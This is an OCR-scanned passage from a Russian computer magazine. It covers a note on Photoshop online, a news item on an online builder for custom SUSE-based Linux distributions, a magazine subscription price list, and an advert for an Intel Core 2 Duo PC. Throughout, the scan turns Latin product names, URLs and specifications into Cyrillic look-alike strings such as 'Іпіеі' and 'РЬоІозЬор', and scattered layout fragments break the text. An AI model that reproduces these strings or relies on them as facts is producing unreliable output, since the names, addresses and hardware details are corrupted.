фиями в браузере. Зато выполнитьэлементарные действия, обрезать 
ненужные края, убрать красные глаза, поиграть с цветами — это все 
идеально выполняется с помощью РЬоІозЬор опііпе. Причем, всеэти 
возможности предлагаются в качестве бонуса косновной функции — 
хостингу фотографий. 




АррЬягк* 













Ртоіміін 5итір іегѵ«г 



5іог* 5» А тетогу іспріі 



Аррііапсе Іо^о Аррііапсе Ьаск^гоиті 




А 




Создаем Ыпих-дистрибутив 
под себя 



БизЕзтішіо 

зизезіисііо.сот 



Перед самой сдачей номера в печатьбыл публично 
представлен онлайн-сервис для создания своего собственного линукса. В 
качестве основы выбирается ЗеОЗ, орепЗИЗЕ или 51І5Е Біпих Епіегргізе, 
затем обозначается набор софта, устанавливаются различные настройки 
и конфигурации. А на выходе ты получаешь готовый дистрибутив водном 
из нескольких вариантов: обычном 150-образе, образе БіѵеСО, образе для 
виртуальных машин Хеп ѴМѵѵаге. И самое вкусное — такой дистрибутив 
можно забрендировать, поставив свой логотип! 
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подпишись 



Подписка - это: 

■ Выгода ■ Гарантия ■ Сервис 



\ллллл/.дІс.ги 



й 

00 

< 






автомобилей 



сагтияс 



ШОРСПШ 




6 мес. 594, 00 руб. 6 мес. 653, 40 руб. 

12мес. 1056, 00 руб. 12 мес. 1188,00 руб. 



6 мес. 415,80 руб. 

1 2 мес. 720, 00 руб. 

По спец, акции на сайте! 






СТРАНА 



ИГР 




йдПаРНоСо 



2 

о 

е 



6 мес. 2400, 00 руб. 6 мес. 1 300, 00 руб. 6 мес. 950, 40 руб. 

12 мес. 4400,00 руб. 12 мес. 1188,00 руб. 12 мес. 171 6,00 руб. 

По спец, акции на сайте! 





фоилр 

МАСТЕРСКАЯ 




6 мес. 653, 40 руб. 
12 мес. 1188,00 руб. 




ОІЮХРЕРТ 




6 мес. 1 080, 00 руб. 
12 мес. 1960,00 руб. 



Цифровые 



ШПШ 




6 мес. 670, 00 руб. 
12 мес. 1230,00 руб. 




3 мес. 570, 00 руб. 
б мес. 1 080, 00 руб. 





6 мес. 653, 40 руб. 
12 мес. 1188,00 руб. 




Вышивают 

"-крестиком 




1 6 мес. 432, 30 руб. 
13 мес. 572, 00 руб 

По спец акции на сайте! 



ШМаІІ 





6 мес. 670, 00 руб. 

1 2 мес. 840, 00 руб. 

По спец, акции на сайте! 



зкразз 





4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



4 мес. 466, 00 руб. 
8 мес. 848, 00 руб. 



І^Іоипіаіп 

Віке 




6 мес. 534, 60 руб. 
1 2 мес. 990, 00 руб. 




смйш 




6 мес. 890, 00 руб. 

1 2 мес. 1 630, 00 руб. 



КОМПЛЕКТЫ: 




6 мес. 2100,00 руб. 
1 2 мес. 3720, 00 руб. 



6 мес. 2052, 00 руб. 
1 2 мес. 3744, 00 руб. 



6 мес. 3150,00 руб. 
1 2 мес. 5580, 60 руб. 



(дате)іаші 

МЕДИА ДЛЯ ЭНТУЗИАСТОВ 

Реклама 


















реклама 




Что выбрать? 

Максимум возможностей?! 
Или ничего лишнего!? 

РІ.ЕХТВОІХІ® Ргетіега - 

ОИгЛи чшли компьютер 
для вашего ойіличниіса/ 




Ищи знак 

Іпіеі 

ІП5ІСІѲ® 





Процессор Іпіеі® Соге ™2 Рио Е 7400 

Графический процессор 

ІМѴЮІА СеРогсе 9 В 00 СТ 

Материнская плата А 81 ІЗ Р 501 -Е 
Оперативная память 4 СВ 



Персональный компьютер РІ.ЕХТВОІМ® Ргетіега 
на базе процессора ІпЪеІ® Соге ™2 Рио 



Просматривая рекламу обычно не читают строки набран- 
ные мелким шрифтом. Максимум - пробегают заголовки. 
И очень жаль, поскольку так никто и никогда не сможет 
узнать, что: 



1 

2 

3 

4 



Процессор ІпСеІ® Соге™2 Оио двухъядерный - а это в два раза бы- 
стрее, чем очень-очень быстро! Что совершенно необходимо для того, 
чтобы не провести свою драгоценную жизнь перед песочными часа- 
ми на экране вашего любимого компьютера, в ожидании завершения 
какой-то простейшей операции... 

Что всего через год все компьютерные игры станут по-настоящему объ- 
емными и ваш новый РІ.ЕХТКОШ Ргетіега уже готов к ним и значок 
ЗйЗСегео взят не из фантастического романа, а из нашего с вами бли- 
жайшего будущего! 

Что большой и надежный жесткий диск дает возможность хранить боль- 
ше фотографий, музыки и фильмов... А прекрасная оснащенность ком- 
пьютера РІ-ЕХТПОШ Ргетіега дает вам возможность не думать о том - 
есть в вашем компьютере нужный разъем для вашего нового «гаджета» 
или нет... Он однозначно есть!.. 

Наконец, что предустановленная операционная система Шіпсіоіліз ѴізЪа 
Ноте Ргетіит - это не последствия «борьбы с пиратством», а очень 
удобный инструмент, по-настоящему надежный, делающий общение с 
компьютером доступным самым обычным людям. Таким как мы с вами. 
А не только узкому кругу хакеров, специалистов-компьютерщиков, гуру 
и прочим профи... 



Жесткий диск 500 ГБ 

ОѴО-ГОѴ, Сагсі Оеасіег АІІ-іп-1 

Операционная система 

ѴѴіпсІоѵѵз Ѵізіа Ноте Ргетіит 




ф 



КОМПЬЮТЕРЫ ОРГТЕХНИКА 
КОМПЛЕКТУЮЩИЕ 



Ну и наконец, что сейчас РІ.ЕХТВОІМ Ргетіега продается за 19 990 рублей 
- что совсем немного для действительно хорошего, быстрого и современного 
компьютера 

Хотите узнать больше про компьютеры 
и современные технологии? 

Приходите в наши магазины! 



Единая справочная: ( 495 ) 925 - 64-47 



Интернет-магазин: мллллі.ТсепЪег.ічі 

Адреса салонов-магазинов: 



мллллі.ТсепЪег.ги мллллі.ісзііор.ги 



® «Бабушкинская» ул. Сухонская, 7 А 
® «Беляево» ул. Миклухо-Маклая, 55 
(м) «Владыкино» Алтуфьевское ш„ 1 6 
(м) «Улица 1905 года» ул. Мантулинская, 2 



Сеіегоп, Сеіегоп Іпзісіе, Сепігіпо, Сепігіпо І_о§о, Соге Іпзісіе, Іпіеі, Іпіеі 1_о|*о, Іпіеі Соге, Іпіеі Іпзісіе, Іпіеі Іпзісіе І_о§о, Іпіеі Ѵііѵ, Іпіеі ѵРго, Ііапіит, Ііапіит Іпзісіе, Репііит, Репііит Іпзісіе, Хеоп, и Хеоп Іпзісіе 
являются товарными знаками, либо зарегистрированными товарными знаками, права на которые принадлежат корпорации Іпіеі или ее подразделениями на территории США и других стран. 



Для получения дополнительной информации о рейтинге процессоров Іпіеі посетите сайтілішѵи.іпЪеІ.ги/гаЪіпд. 





